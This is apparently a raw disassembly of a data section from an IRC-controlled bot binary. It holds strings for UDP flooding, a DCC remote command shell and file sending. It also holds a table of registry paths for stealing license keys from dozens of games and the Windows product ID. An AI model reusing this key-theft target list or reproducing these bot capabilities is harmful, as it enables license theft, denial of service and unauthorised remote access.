align 4
; char asc_44D044[]
asc_44D044 db '-' ; DATA XREF: sub_4151C6+2A�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorCallingSo db '- Error calling socket().',0
align 10h
unk_44D070 db 2Dh ; - ; DATA XREF: sub_4151C6+63�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorCallingSe db '- Error calling setsockopt(). WSAGetLastError() returns %d.',0
align 10h
; char asc_44D0C0[]
asc_44D0C0 db '-' ; DATA XREF: sub_4151C6+80�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aInvalidTarge_1 db '- Invalid target IP. WSAGetLastError() returns %d.',0
; char asc_44D104[]
asc_44D104 db '-' ; DATA XREF: sub_4151C6+CC�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aSendingPackets db '- Sending packets to %s...',0
; char aD_D_D_D_2[]
aD_D_D_D_2 db '%d.%d.%d.%d',0 ; DATA XREF: sub_4151C6+180�o
unk_44D13C db 2Dh ; - ; DATA XREF: sub_4151C6+345�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorSending_2 db '- Error sending packets to %s. eax=SOCKET_ERROR, WSAGetLastError('
db ')=%d. sizeof(buffer) = %d. Packets sent sucessfully = %d.',0
; char asc_44D1C8[]
asc_44D1C8 db '-' ; DATA XREF: sub_4151C6+2F3�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aFinishedSend_1 db '- Finished sending packets to %s. Sent %d packet(s). ~%dMB of dat'
db 'a sent (~%dK/s).',0
align 4
; char asc_44D22C[]
asc_44D22C db '-' ; DATA XREF: sub_415512+60�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aDoneWithFloodP db 'Done with flood, ports hit: %s',0
align 4
; char asc_44D258[]
asc_44D258 db ' ',0 ; DATA XREF: sub_4156AF+1C5�o
align 4
; char aSD[]
aSD db '%s%d ',0 ; DATA XREF: sub_4156AF+207�o
align 4
dword_44D264 dd 234032Dh, 61696C61h, 696C2073h, 3027473h, 2Dh ; DATA XREF: sub_415BC7+10�o
; char aD_[]
aD_ db '%d. ' ; DATA XREF: sub_415BC7+35�o
dd 73253403h, 203D2003h, 73253703h, 3
; char a_2d_2d4d_2d_2d[]
a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_415C3F+60�o
align 10h
dword_44D2B0 dd 234032Dh, 2676F6Ch, 2D03h ; DATA XREF: .text:00415CFB�o
dword_44D2BC dd 234032Dh, 2676F6Ch, 63202D03h, 7261656Ch, 6465h
; DATA XREF: sub_415D7C+20�o
dword_44D2D0 dd 234032Dh, 3676F6Ch, 43202D02h, 7261656Ch, 2E6465h
; DATA XREF: sub_415D7C:loc_415DB1�o
dword_44D2E4 dd 234032Dh, 2676F6Ch, 6C202D03h, 20747369h, 72617473h
; DATA XREF: sub_415DEF+3F�o
dd 676E6974h, 0
; char asc_44D300[]
asc_44D300 db '-' ; DATA XREF: sub_415DEF+DC�o
db 3, 34h, 2
dd 2676F6Ch, 6C202D03h, 20747369h, 706D6F63h, 6574656Ch
dd 0
aDisplay db 'DISPLAY',0 ; DATA XREF: sub_415F1E+11�o
aWindow db 'Window',0 ; DATA XREF: sub_416159+23�o
align 4
aWindow_0 db 'Window',0 ; DATA XREF: sub_416352+26�o
align 8
dd 80000001h
off_44D33C dd offset aSoftwareValveC ; DATA XREF: sub_416591+C�r
; sub_416591+21�o
; "Software\\Valve\\CounterStrike\\Settings"
dd offset aCdkey_0 ; "CDKey"
dd offset aCounterStrikeR ; "Counter-Strike (Retail)"
dword_44D348 dd 2 dup(0) ; DATA XREF: sub_416591+26�o
dd 80000001h
dd offset aSoftwareEugenS ; "Software\\Eugen Systems\\The Gladiators"
dd offset aRegnumber ; "RegNumber"
dd offset aTheGladiators ; "The Gladiators"
dd 2 dup(0)
dd 80000001h
dd offset aSoftwareValveG ; "Software\\Valve\\Gunman\\Settings"
dd offset aKey_0 ; "Key"
dd offset aGunmanChronicl ; "Gunman Chronicles"
align 10h
dd 80000001h
dd offset aSoftwareValveH ; "Software\\Valve\\Half-Life\\Settings"
dd offset aKey_1 ; "Key"
dd offset aHalfLife ; "Half-Life"
dd 2 dup(0)
dd 80000001h
dd offset aSoftwareJowood ; "Software\\JoWooD\\InstalledGames\\IG2"
dd offset aPrvkey ; "prvkey"
dd offset aIndustryGiant2 ; "Industry Giant 2"
align 10h
dd 80000001h
dd offset aSoftware3d0Sta ; "Software\\3d0\\Status"
dd offset aCustomernumber ; "CustomerNumber"
dd offset aLegendsOfMight ; "Legends of Might and Magic"
dd 2 dup(0)
dd 80000001h
dd offset aSoftwareSilver ; "Software\\Silver Style Entertainment\\Sol"...
dd offset aCdkey_1 ; "CDKey"
dd offset aSoldiersOfAnar ; "Soldiers Of Anarchy"
align 10h
dd 80000002h
dd offset aSoftwareMicr_2 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
dd offset aProductid ; "ProductId"
dd offset aMicrosoftWindo ; "Microsoft Windows Product ID"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareUnreal ; "Software\\Unreal Technology\\Installed Ap"...
dd offset aCdkey_2 ; "CDKey"
dd offset aUnrealTourname ; "Unreal Tournament 2003"
align 10h
dd 80000002h
dd offset aSoftwareUnre_0 ; "Software\\Unreal Technology\\Installed Ap"...
dd offset aCdkey_3 ; "CDKey"
dd offset aUnrealTourna_0 ; "Unreal Tournament 2004"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareIgi2Re ; "Software\\IGI 2 Retail"
dd offset aCdkey_4 ; "CDKey"
dd offset aIgi2CovertStri ; "IGI 2: Covert Strike"
align 10h
dd 80000002h
dd offset aSoftwareElectr ; "Software\\Electronic Arts\\EA Distributio"...
dd offset dword_4EAD78
dd offset aFreedomForce ; "Freedom Force"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareElec_0 ; "Software\\Electronic Arts\\EA GAMES\\Battl"...
dd offset dword_4EAD7C
dd offset aBattlefield194 ; "Battlefield 1942"
align 10h
dd 80000002h
dd offset aSoftwareElec_1 ; "Software\\Electronic Arts\\EA GAMES\\Battl"...
dd offset dword_4EAD80
dd offset aBattlefield1_0 ; "Battlefield 1942 (Road To Rome)"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareElec_2 ; "Software\\Electronic Arts\\EA GAMES\\Battl"...
dd offset dword_4EAD84
dd offset aBattlefield1_1 ; "Battlefield 1942 (Secret Weapons of WWI"...
align 10h
dd 80000002h
dd offset aSoftwareElec_3 ; "Software\\Electronic Arts\\EA GAMES\\Battl"...
dd offset dword_4EAD88
dd offset aBattlefieldVie ; "Battlefield Vietnam"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareElec_4 ; "Software\\Electronic Arts\\EA GAMES\\Black"...
dd offset dword_4EAD8C
dd offset aBlackAndWhite ; "Black and White"
align 10h
dd 80000002h
dd offset aSoftwareElec_5 ; "Software\\Electronic Arts\\EA GAMES\\Comma"...
dd offset dword_4EAD90
dd offset aCommandAndConq ; "Command and Conquer: Generals (Zero Hou"...
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareElec_6 ; "Software\\Electronic Arts\\EA GAMES\\James"...
dd offset dword_4EAD94
dd offset aJamesBond007Ni ; "James Bond 007: Nightfire"
align 10h
dd 80000002h
dd offset aSoftwareElec_7 ; "Software\\Electronic Arts\\EA GAMES\\Gener"...
dd offset dword_4EAD98
dd offset aCommandAndCo_0 ; "Command and Conquer: Generals"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareElec_8 ; "Software\\Electronic Arts\\EA GAMES\\Globa"...
dd offset dword_4EAD9C
dd offset aGlobalOperatio ; "Global Operations"
align 10h
dd 80000002h
dd offset aSoftwareElec_9 ; "Software\\Electronic Arts\\EA GAMES\\Medal"...
dd offset dword_4EADA0
dd offset aMedalOfHonorAl ; "Medal of Honor: Allied Assault"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareEle_10 ; "Software\\Electronic Arts\\EA GAMES\\Medal"...
dd offset dword_4EADA4
dd offset aMedalOfHonor_0 ; "Medal of Honor: Allied Assault: Breakth"...
align 10h
dd 80000002h
dd offset aSoftwareEle_11 ; "Software\\Electronic Arts\\EA GAMES\\Medal"...
dd offset dword_4EADA8
dd offset aMedalOfHonor_1 ; "Medal of Honor: Allied Assault: Spearhe"...
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareEle_12 ; "Software\\Electronic Arts\\EA GAMES\\Need "...
dd offset aErgc ; "ergc"
dd offset aNeedForSpeedHo ; "Need For Speed Hot Pursuit 2"
align 10h
dd 80000002h
dd offset aSoftwareEle_13 ; "Software\\Electronic Arts\\EA GAMES\\Need "...
dd offset dword_4EADAC
dd offset aNeedForSpeedUn ; "Need For Speed: Underground"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareEle_14 ; "Software\\Electronic Arts\\EA GAMES\\Shogu"...
dd offset dword_4EADB0
dd offset aShogunTotalWar ; "Shogun: Total War: Warlord Edition"
align 10h
dd 80000002h
dd offset aSoftwareEle_15 ; "Software\\Electronic Arts\\EA Sports\\FIFA"...
dd offset dword_4EADB4
dd offset aFifa2002 ; "FIFA 2002"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareEle_16 ; "Software\\Electronic Arts\\EA Sports\\FIFA"...
dd offset dword_4EADB8
dd offset aFifa2003 ; "FIFA 2003"
align 10h
dd 80000002h
dd offset aSoftwareEle_17 ; "Software\\Electronic Arts\\EA Sports\\NHL "...
dd offset dword_4EADBC
dd offset aNhl2002 ; "NHL 2002"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareEle_18 ; "Software\\Electronic Arts\\EA Sports\\NHL "...
dd offset dword_4EADC0
dd offset aNhl2003 ; "NHL 2003"
align 10h
dd 80000002h
dd offset aSoftwareEle_19 ; "Software\\Electronic Arts\\EA Sports\\Nasc"...
dd offset dword_4EADC4
dd offset aNascarRacing20 ; "Nascar Racing 2002"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareEle_20 ; "Software\\Electronic Arts\\EA Sports\\Nasc"...
dd offset dword_4EADC8
dd offset aNascarRacing_0 ; "Nascar Racing 2003"
align 10h
dd 80000002h
dd offset aSoftwareRedSto ; "Software\\Red Storm Entertainment\\RAVENS"...
dd offset aCdkey_5 ; "CDKey"
dd offset aRainbowSixIiiR ; "Rainbow Six III RavenShield"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareWestwo ; "Software\\Westwood\\Tiberian Sun"
dd offset aSerial ; "Serial"
dd offset aCommandAndCo_1 ; "Command and Conquer: Tiberian Sun"
align 10h
dd 80000002h
dd offset aSoftwareWest_0 ; "Software\\Westwood\\Red Alert"
dd offset aSerial_0 ; "Serial"
dd offset aCommandAndCo_2 ; "Command and Conquer: Red Alert"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareWest_1 ; "Software\\Westwood\\Red Alert 2"
dd offset aSerial_1 ; "Serial"
dd offset aCommandAndCo_3 ; "Command and Conquer: Red Alert 2"
align 10h
dd 80000002h
dd offset aSoftwareWest_2 ; "Software\\Westwood\\NOX"
dd offset aSerial_2 ; "Serial"
dd offset aNox ; "NOX"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareTechla ; "Software\\Techland\\Chrome"
dd offset aSerialnumber ; "SerialNumber"
dd offset aChrome ; "Chrome"
align 10h
dd 80000002h
dd offset aSoftwareIllusi ; "Software\\Illusion Softworks\\Hidden & Da"...
dd offset aKey_2 ; "key"
dd offset aHiddenDangerou ; "Hidden & Dangerous 2"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareActivi ; "Software\\Activision\\Soldier of Fortune "...
dd offset aInstallpath ; "InstallPath"
dd offset aSoldierOfFortu ; "Soldier of Fortune II - Double Helix"
dd offset aBaseMpSof2key ; "base\\mp\\sof2key"
dd offset aMtkwftmkemfew3 ; "mtkwftmkemfew3p3b7"
dd 80000002h
dd offset aSoftwareBiowar ; "Software\\BioWare\\NWN\\Neverwinter"
dd offset aLocation ; "Location"
dd offset aNeverwinterNig ; "Neverwinter Nights"
dd offset aNwncdkey_ini ; "nwncdkey.ini"
dd offset aKey1 ; "Key1="
dd 80000002h
dd offset aSoftwareBiow_0 ; "Software\\BioWare\\NWN\\Neverwinter"
dd offset aLocation_0 ; "Location"
dd offset aNeverwinterN_0 ; "Neverwinter Nights (Shadows of Undrenti"...
dd offset aNwncdkey_ini_0 ; "nwncdkey.ini"
dd offset aKey2 ; "Key2="
dd 80000002h
dd offset aSoftwareBiow_1 ; "Software\\BioWare\\NWN\\Neverwinter"
dd offset aLocation_1 ; "Location"
dd offset aNeverwinterN_1 ; "Neverwinter Nights (Hordes of the Under"...
dd offset aNwncdkey_ini_1 ; "nwncdkey.ini"
dd offset aKey3 ; "Key3="
dd 6 dup(0)
aSoftwareValveC db 'Software\Valve\CounterStrike\Settings',0 ; DATA XREF: .data:off_44D33C�o
align 4
aCdkey_0 db 'CDKey',0 ; DATA XREF: .data:0044D340�o
align 10h
aCounterStrikeR db 'Counter-Strike (Retail)',0 ; DATA XREF: .data:0044D344�o
aSoftwareEugenS db 'Software\Eugen Systems\The Gladiators',0 ; DATA XREF: .data:0044D354�o
align 10h
aRegnumber db 'RegNumber',0 ; DATA XREF: .data:0044D358�o
align 4
aTheGladiators db 'The Gladiators',0 ; DATA XREF: .data:0044D35C�o
align 4
aSoftwareValveG db 'Software\Valve\Gunman\Settings',0 ; DATA XREF: .data:0044D36C�o
align 4
aKey_0 db 'Key',0 ; DATA XREF: .data:0044D370�o
aGunmanChronicl db 'Gunman Chronicles',0 ; DATA XREF: .data:0044D374�o
align 4
aSoftwareValveH db 'Software\Valve\Half-Life\Settings',0 ; DATA XREF: .data:0044D384�o
align 4
aKey_1 db 'Key',0 ; DATA XREF: .data:0044D388�o
aHalfLife db 'Half-Life',0 ; DATA XREF: .data:0044D38C�o
align 4
aSoftwareJowood db 'Software\JoWooD\InstalledGames\IG2',0 ; DATA XREF: .data:0044D39C�o
align 4
aPrvkey db 'prvkey',0 ; DATA XREF: .data:0044D3A0�o
align 4
aIndustryGiant2 db 'Industry Giant 2',0 ; DATA XREF: .data:0044D3A4�o
align 4
aSoftware3d0Sta db 'Software\3d0\Status',0 ; DATA XREF: .data:0044D3B4�o
aCustomernumber db 'CustomerNumber',0 ; DATA XREF: .data:0044D3B8�o
align 4
aLegendsOfMight db 'Legends of Might and Magic',0 ; DATA XREF: .data:0044D3BC�o
align 4
aSoftwareSilver db 'Software\Silver Style Entertainment\Soldiers Of Anarchy\Settings',0
; DATA XREF: .data:0044D3CC�o
align 4
aCdkey_1 db 'CDKey',0 ; DATA XREF: .data:0044D3D0�o
align 4
aSoldiersOfAnar db 'Soldiers Of Anarchy',0 ; DATA XREF: .data:0044D3D4�o
aSoftwareMicr_2 db 'Software\Microsoft\Windows\CurrentVersion',0
; DATA XREF: .data:0044D3E4�o
align 4
aProductid db 'ProductId',0 ; DATA XREF: .data:0044D3E8�o
align 10h
aMicrosoftWindo db 'Microsoft Windows Product ID',0 ; DATA XREF: .data:0044D3EC�o
align 10h
aSoftwareUnreal db 'Software\Unreal Technology\Installed Apps\UT2003',0
; DATA XREF: .data:0044D3FC�o
align 4
aCdkey_2 db 'CDKey',0 ; DATA XREF: .data:0044D400�o
align 4
aUnrealTourname db 'Unreal Tournament 2003',0 ; DATA XREF: .data:0044D404�o
align 4
aSoftwareUnre_0 db 'Software\Unreal Technology\Installed Apps\UT2004',0
; DATA XREF: .data:0044D414�o
align 4
aCdkey_3 db 'CDKey',0 ; DATA XREF: .data:0044D418�o
align 10h
aUnrealTourna_0 db 'Unreal Tournament 2004',0 ; DATA XREF: .data:0044D41C�o
align 4
aSoftwareIgi2Re db 'Software\IGI 2 Retail',0 ; DATA XREF: .data:0044D42C�o
align 10h
aCdkey_4 db 'CDKey',0 ; DATA XREF: .data:0044D430�o
align 4
aIgi2CovertStri db 'IGI 2: Covert Strike',0 ; DATA XREF: .data:0044D434�o
align 10h
aSoftwareElectr db 'Software\Electronic Arts\EA Distribution\Freedom Force\ergc',0
; DATA XREF: .data:0044D444�o
aFreedomForce db 'Freedom Force',0 ; DATA XREF: .data:0044D44C�o
align 4
aSoftwareElec_0 db 'Software\Electronic Arts\EA GAMES\Battlefield 1942\ergc',0
; DATA XREF: .data:0044D45C�o
aBattlefield194 db 'Battlefield 1942',0 ; DATA XREF: .data:0044D464�o
align 4
aSoftwareElec_1 db 'Software\Electronic Arts\EA GAMES\Battlefield 1942 The Road to Ro'
; DATA XREF: .data:0044D474�o
db 'me\ergc',0
align 4
aBattlefield1_0 db 'Battlefield 1942 (Road To Rome)',0 ; DATA XREF: .data:0044D47C�o
aSoftwareElec_2 db 'Software\Electronic Arts\EA GAMES\Battlefield 1942 Secret Weapons'
; DATA XREF: .data:0044D48C�o
db ' of WWII\ergc',0
align 4
aBattlefield1_1 db 'Battlefield 1942 (Secret Weapons of WWII)',0
; DATA XREF: .data:0044D494�o
align 10h
aSoftwareElec_3 db 'Software\Electronic Arts\EA GAMES\Battlefield Vietnam\ergc',0
; DATA XREF: .data:0044D4A4�o
align 4
aBattlefieldVie db 'Battlefield Vietnam',0 ; DATA XREF: .data:0044D4AC�o
aSoftwareElec_4 db 'Software\Electronic Arts\EA GAMES\Black and White\ergc',0
; DATA XREF: .data:0044D4BC�o
align 4
aBlackAndWhite db 'Black and White',0 ; DATA XREF: .data:0044D4C4�o
aSoftwareElec_5 db 'Software\Electronic Arts\EA GAMES\Command and Conquer Generals Ze'
; DATA XREF: .data:0044D4D4�o
db 'ro Hour\ergc',0
align 4
aCommandAndConq db 'Command and Conquer: Generals (Zero Hour)',0
; DATA XREF: .data:0044D4DC�o
align 4
aSoftwareElec_6 db 'Software\Electronic Arts\EA GAMES\James Bond 007 Nightfire\ergc',0
; DATA XREF: .data:0044D4EC�o
aJamesBond007Ni db 'James Bond 007: Nightfire',0 ; DATA XREF: .data:0044D4F4�o
align 10h
aSoftwareElec_7 db 'Software\Electronic Arts\EA GAMES\Generals\ergc',0
; DATA XREF: .data:0044D504�o
aCommandAndCo_0 db 'Command and Conquer: Generals',0 ; DATA XREF: .data:0044D50C�o
align 10h
aSoftwareElec_8 db 'Software\Electronic Arts\EA GAMES\Global Operations\ergc',0
; DATA XREF: .data:0044D51C�o
align 4
aGlobalOperatio db 'Global Operations',0 ; DATA XREF: .data:0044D524�o
align 10h
aSoftwareElec_9 db 'Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault\e'
; DATA XREF: .data:0044D534�o
db 'rgc',0
align 4
aMedalOfHonorAl db 'Medal of Honor: Allied Assault',0 ; DATA XREF: .data:0044D53C�o
align 4
aSoftwareEle_10 db 'Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault B'
; DATA XREF: .data:0044D54C�o
db 'reakthrough\ergc',0
align 4
aMedalOfHonor_0 db 'Medal of Honor: Allied Assault: Breakthrough',0
; DATA XREF: .data:0044D554�o
align 4
aSoftwareEle_11 db 'Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault S'
; DATA XREF: .data:0044D564�o
db 'pearhead\ergc',0
align 4
aMedalOfHonor_1 db 'Medal of Honor: Allied Assault: Spearhead',0
; DATA XREF: .data:0044D56C�o
align 4
aSoftwareEle_12 db 'Software\Electronic Arts\EA GAMES\Need For Speed Hot Pursuit 2',0
; DATA XREF: .data:0044D57C�o
align 4
aErgc db 'ergc',0 ; DATA XREF: .data:0044D580�o
align 10h
aNeedForSpeedHo db 'Need For Speed Hot Pursuit 2',0 ; DATA XREF: .data:0044D584�o
align 10h
aSoftwareEle_13 db 'Software\Electronic Arts\EA GAMES\Need For Speed Underground\ergc'
; DATA XREF: .data:0044D594�o
db 0
align 4
aNeedForSpeedUn db 'Need For Speed: Underground',0 ; DATA XREF: .data:0044D59C�o
aSoftwareEle_14 db 'Software\Electronic Arts\EA GAMES\Shogun Total War - Warlord Edit'
; DATA XREF: .data:0044D5AC�o
db 'ion\ergc',0
align 4
aShogunTotalWar db 'Shogun: Total War: Warlord Edition',0 ; DATA XREF: .data:0044D5B4�o
align 10h
aSoftwareEle_15 db 'Software\Electronic Arts\EA Sports\FIFA 2002\ergc',0
; DATA XREF: .data:0044D5C4�o
align 4
aFifa2002 db 'FIFA 2002',0 ; DATA XREF: .data:0044D5CC�o
align 10h
aSoftwareEle_16 db 'Software\Electronic Arts\EA Sports\FIFA 2003\ergc',0
; DATA XREF: .data:0044D5DC�o
align 4
aFifa2003 db 'FIFA 2003',0 ; DATA XREF: .data:0044D5E4�o
align 10h
aSoftwareEle_17 db 'Software\Electronic Arts\EA Sports\NHL 2002\ergc',0
; DATA XREF: .data:0044D5F4�o
align 4
aNhl2002 db 'NHL 2002',0 ; DATA XREF: .data:0044D5FC�o
align 10h
aSoftwareEle_18 db 'Software\Electronic Arts\EA Sports\NHL 2003\ergc',0
; DATA XREF: .data:0044D60C�o
align 4
aNhl2003 db 'NHL 2003',0 ; DATA XREF: .data:0044D614�o
align 10h
aSoftwareEle_19 db 'Software\Electronic Arts\EA Sports\Nascar Racing 2002\ergc',0
; DATA XREF: .data:0044D624�o
align 4
aNascarRacing20 db 'Nascar Racing 2002',0 ; DATA XREF: .data:0044D62C�o
align 10h
aSoftwareEle_20 db 'Software\Electronic Arts\EA Sports\Nascar Racing 2003\ergc',0
; DATA XREF: .data:0044D63C�o
align 4
aNascarRacing_0 db 'Nascar Racing 2003',0 ; DATA XREF: .data:0044D644�o
align 10h
aSoftwareRedSto db 'Software\Red Storm Entertainment\RAVENSHIELD',0
; DATA XREF: .data:0044D654�o
align 10h
aCdkey_5 db 'CDKey',0 ; DATA XREF: .data:0044D658�o
align 4
aRainbowSixIiiR db 'Rainbow Six III RavenShield',0 ; DATA XREF: .data:0044D65C�o
aSoftwareWestwo db 'Software\Westwood\Tiberian Sun',0 ; DATA XREF: .data:0044D66C�o
align 4
aSerial db 'Serial',0 ; DATA XREF: .data:0044D670�o
align 4
aCommandAndCo_1 db 'Command and Conquer: Tiberian Sun',0 ; DATA XREF: .data:0044D674�o
align 10h
aSoftwareWest_0 db 'Software\Westwood\Red Alert',0 ; DATA XREF: .data:0044D684�o
aSerial_0 db 'Serial',0 ; DATA XREF: .data:0044D688�o
align 4
aCommandAndCo_2 db 'Command and Conquer: Red Alert',0 ; DATA XREF: .data:0044D68C�o
align 4
aSoftwareWest_1 db 'Software\Westwood\Red Alert 2',0 ; DATA XREF: .data:0044D69C�o
align 4
aSerial_1 db 'Serial',0 ; DATA XREF: .data:0044D6A0�o
align 4
aCommandAndCo_3 db 'Command and Conquer: Red Alert 2',0 ; DATA XREF: .data:0044D6A4�o
align 10h
aSoftwareWest_2 db 'Software\Westwood\NOX',0 ; DATA XREF: .data:0044D6B4�o
align 4
aSerial_2 db 'Serial',0 ; DATA XREF: .data:0044D6B8�o
align 10h
aNox db 'NOX',0 ; DATA XREF: .data:0044D6BC�o
aSoftwareTechla db 'Software\Techland\Chrome',0 ; DATA XREF: .data:0044D6CC�o
align 10h
aSerialnumber db 'SerialNumber',0 ; DATA XREF: .data:0044D6D0�o
align 10h
aChrome db 'Chrome',0 ; DATA XREF: .data:0044D6D4�o
align 4
aSoftwareIllusi db 'Software\Illusion Softworks\Hidden & Dangerous 2',0
; DATA XREF: .data:0044D6E4�o
align 4
aKey_2 db 'key',0 ; DATA XREF: .data:0044D6E8�o
aHiddenDangerou db 'Hidden & Dangerous 2',0 ; DATA XREF: .data:0044D6EC�o
align 4
aSoftwareActivi db 'Software\Activision\Soldier of Fortune II - Double Helix',0
; DATA XREF: .data:0044D6FC�o
align 4
aInstallpath db 'InstallPath',0 ; DATA XREF: .data:0044D700�o
aSoldierOfFortu db 'Soldier of Fortune II - Double Helix',0 ; DATA XREF: .data:0044D704�o
align 4
aBaseMpSof2key db 'base\mp\sof2key',0 ; DATA XREF: .data:0044D708�o
aMtkwftmkemfew3 db 'mtkwftmkemfew3p3b7',0 ; DATA XREF: .data:0044D70C�o
align 4
aSoftwareBiowar db 'Software\BioWare\NWN\Neverwinter',0 ; DATA XREF: .data:0044D714�o
align 10h
aLocation db 'Location',0 ; DATA XREF: .data:0044D718�o
align 4
aNeverwinterNig db 'Neverwinter Nights',0 ; DATA XREF: .data:0044D71C�o
align 10h
aNwncdkey_ini db 'nwncdkey.ini',0 ; DATA XREF: .data:0044D720�o
align 10h
aKey1 db 'Key1=',0 ; DATA XREF: .data:0044D724�o
align 4
aSoftwareBiow_0 db 'Software\BioWare\NWN\Neverwinter',0 ; DATA XREF: .data:0044D72C�o
align 4
aLocation_0 db 'Location',0 ; DATA XREF: .data:0044D730�o
align 4
aNeverwinterN_0 db 'Neverwinter Nights (Shadows of Undrentide)',0
; DATA XREF: .data:0044D734�o
align 4
aNwncdkey_ini_0 db 'nwncdkey.ini',0 ; DATA XREF: .data:0044D738�o
align 4
aKey2 db 'Key2=',0 ; DATA XREF: .data:0044D73C�o
align 4
aSoftwareBiow_1 db 'Software\BioWare\NWN\Neverwinter',0 ; DATA XREF: .data:0044D744�o
align 10h
aLocation_1 db 'Location',0 ; DATA XREF: .data:0044D748�o
align 4
aNeverwinterN_1 db 'Neverwinter Nights (Hordes of the Underdark)',0
; DATA XREF: .data:0044D74C�o
align 4
aNwncdkey_ini_1 db 'nwncdkey.ini',0 ; DATA XREF: .data:0044D750�o
align 4
aKey3 db 'Key3=',0 ; DATA XREF: .data:0044D754�o
align 4
; char aSS_7[]
aSS_7 db '%s\%s',0 ; DATA XREF: sub_416591+79�o
align 4
; char aR_1[]
aR_1: ; DATA XREF: sub_416591+8A�o
unicode 0, <r>,0
; char asc_44E610[]
asc_44E610: ; DATA XREF: sub_416591+DE�o
unicode 0, <=>,0
; char asc_44E614[]
asc_44E614: ; DATA XREF: sub_416591+E9�o
unicode 0, <=>,0
dword_44E618 dd 234032Dh, 656B6463h, 3027379h, 7325202Dh, 7325203Ah
; DATA XREF: sub_416591+FB�o
dd 0
; char asc_44E630[]
asc_44E630 db '-' ; DATA XREF: sub_416591+109�o
db 3, 34h, 2
dd 656B6463h, 3027379h, 7325202Dh, 7325203Ah, 0
; char asc_44E648[]
asc_44E648 db '-' ; DATA XREF: sub_416591+15B�o
db 3, 34h, 2
dd 656B6463h, 3027379h, 7325202Dh, 7325203Ah, 0
; char asc_44E660[]
asc_44E660 db '-' ; DATA XREF: sub_4167BF+47�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToOpenSo db '- failed to open socket',0
align 4
; char asc_44E684[]
asc_44E684 db '-' ; DATA XREF: sub_4167BF+AB�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToOpenRe db '- failed to open remote command shell',0
align 4
; char asc_44E6B4[]
asc_44E6B4 db 0Ah,0 ; DATA XREF: sub_4167BF+138�o
align 4
; char asc_44E6B8[]
asc_44E6B8 db '-' ; DATA XREF: sub_4167BF+170�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToSendTo db '- failed to send to Remote command shell',0
align 4
unk_44E6EC db 2Dh ; - ; DATA XREF: sub_416980+44�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToCrea_3 db '- failed to create socket',0
align 10h
unk_44E710 db 2Dh ; - ; DATA XREF: sub_416980+82�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToBindTo db '- failed to bind to socket',0
unk_44E734 db 2Dh ; - ; DATA XREF: sub_416980+FD�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToOpen_0 db '- failed to open socket',0
align 4
unk_44E758 db 2Dh ; - ; DATA XREF: sub_416980+127�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFileDoesnTExis db '- file doesn',27h,'t exist',0
align 4
; char dword_44E778
dword_44E778 dd 43434401h, 4E455320h, 73252044h, 20692520h, 25206925h
; DATA XREF: sub_416980+16A�o
dd 169h
dword_44E790 dd 234032Dh, 2636364h, 73202D03h, 20646E65h, 656D6974h
; DATA XREF: sub_416980+1CB�o
dd 74756Fh
; char asc_44E7A8[]
asc_44E7A8 db '-' ; DATA XREF: sub_416980+202�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aUnableToOpenSo db '- unable to open socket',0
align 4
dword_44E7CC dd 234032Dh, 2636364h, 73202D03h, 656B636Fh, 72652074h
; DATA XREF: sub_416980+36B�o
dd 726F72h
dword_44E7E4 dd 234032Dh, 2636364h, 73202D03h, 656B636Fh, 72652074h
; DATA XREF: sub_416980+37C�o
dd 726F72h
; char asc_44E7FC[]
asc_44E7FC db '-' ; DATA XREF: sub_416980+2FA�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFileSSentToSSB db '- file %s sent to %s (%s bytes).',0
align 4
; char aSS_8[]
aSS_8 db '%s%s',0 ; DATA XREF: sub_416D25+54�o
align 10h
